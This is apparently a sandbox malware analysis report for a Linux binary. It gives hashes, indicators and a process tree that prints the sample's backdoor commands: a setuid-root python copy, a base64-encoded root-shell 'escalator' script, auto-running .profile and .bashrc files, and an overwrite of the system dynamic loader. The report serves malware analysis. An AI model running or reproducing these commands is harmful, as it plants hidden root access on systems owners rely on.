f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8

Analysis

max time kernel
3s
max time network
583s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221111-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
12-04-2023 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
Size

870KB
MD5

67048a69a007c37f8be5d01a95f6a026
SHA1

8e47e49602747f3be4d469a0c573f0362b353b61
SHA256

f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
SHA512

21e6e6b330b74528b2b8c050d6b4ca98d87d4a25660f73d6978f688fdf45c9a2da457292af852eae8f8d276ddf297f2d88b00b6f7c8bba0cd05c9272eb64d21b
SSDEEP

12288:Bj3fBFLLnkYoc9HBhFavQTv0yPImneP4uYl2cAl4B4JVk6x3ww:9fBFLLnNoYfsUoP4uYl2cAlPJVnx3

Score

5^/10

Malware Config

Signatures

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

Processes:

mvmkdircplsf1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8mkdircpcp

description	ioc	process
/proc/filesystems	/proc/filesystems	mv
/proc/filesystems	/proc/filesystems	mkdir
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	ls
/proc/version	/proc/version	f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
/proc/filesystems	/proc/filesystems	mkdir
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp

/tmp/f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
/tmp/f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
1⤵
- Reads runtime system information
PID:602

/bin/sh
sh -c "mkdir /lib/libntpVnQE6mk"
2⤵
PID:603

/bin/mkdir
mkdir /lib/libntpVnQE6mk
3⤵
- Reads runtime system information
PID:604

/bin/sh
sh -c "cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so"
2⤵
PID:605

/bin/cp
cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so
3⤵
- Reads runtime system information
PID:606

/bin/sh
sh -c "ls -l /lib64/ld-linux-x86-64.so.2"
2⤵
PID:607

/bin/ls
ls -l /lib64/ld-linux-x86-64.so.2
3⤵
- Reads runtime system information
PID:608

/bin/sh
sh -c "chown -R 920366:920366 /lib/libntpVnQE6mk/"
2⤵
PID:609

/bin/chown
chown -R 920366:920366 /lib/libntpVnQE6mk/
3⤵
PID:610

/bin/sh
sh -c "mkdir /lib/libntpVnQE6mk/bin; cp /usr/bin/python /lib/libntpVnQE6mk/bin/python; chmod 4755 /lib/libntpVnQE6mk/bin/python"
2⤵
PID:611

/bin/mkdir
mkdir /lib/libntpVnQE6mk/bin
3⤵
- Reads runtime system information
PID:612

/bin/cp
cp /usr/bin/python /lib/libntpVnQE6mk/bin/python
3⤵
- Reads runtime system information
PID:613

/bin/chmod
chmod 4755 /lib/libntpVnQE6mk/bin/python
3⤵
PID:614

/bin/sh
sh -c "echo aW1wb3J0IG9zCm9zLnNldHJldWlkKDAsMCkKb3MuZXhlY3YoIi9iaW4vYmFzaCIsICgiL2Jpbi9iYXNoIiwgIi1pIikpCg==|base64 -di > /lib/libntpVnQE6mk/bin/escalator"
2⤵
PID:615

/usr/bin/base64
base64 -di
3⤵
PID:617

/bin/sh
sh -c "echo IyEvYmluL2Jhc2gKaWYgWyAiJChpZCAtdSkiIC1uZSAwIF0gOyB0aGVuCiAgIGVjaG8gIldlbGNvbWUgdG8gJChob3N0bmFtZSkuIFlvdSBhcmUgR0lEICQoaWQgLWcpLCBVSUQgJChpZCAtdSkgYW5kIGFib3V0IHRvIGJlIGVzY2FsYXRlZCB0byBVSUQgMC4iCiAgIGV4ZWMgfi9iaW4vcHl0aG9uIH4vYmluL2VzY2FsYXRvcgpmaQpQUzE9J1tcdUBcaCBcV11cJCAnCg==|base64 -di > /lib/libntpVnQE6mk/.profile; chown 920366:920366 /lib/libntpVnQE6mk/.profile; chmod +x /lib/libntpVnQE6mk/.profile;ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc"
2⤵
PID:618

/usr/bin/base64
base64 -di
3⤵
PID:620

/bin/chown
chown 920366:920366 /lib/libntpVnQE6mk/.profile
3⤵
PID:621

/bin/chmod
chmod +x /lib/libntpVnQE6mk/.profile
3⤵
PID:622

/bin/ln
ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc
3⤵
PID:623

/bin/sh
sh -c "cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so"
2⤵
PID:624

/bin/cp
cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so
3⤵
- Reads runtime system information
PID:625

/bin/sh
sh -c "mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so"
2⤵
PID:626

/bin/mv
mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so
3⤵
- Reads runtime system information
PID:627

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads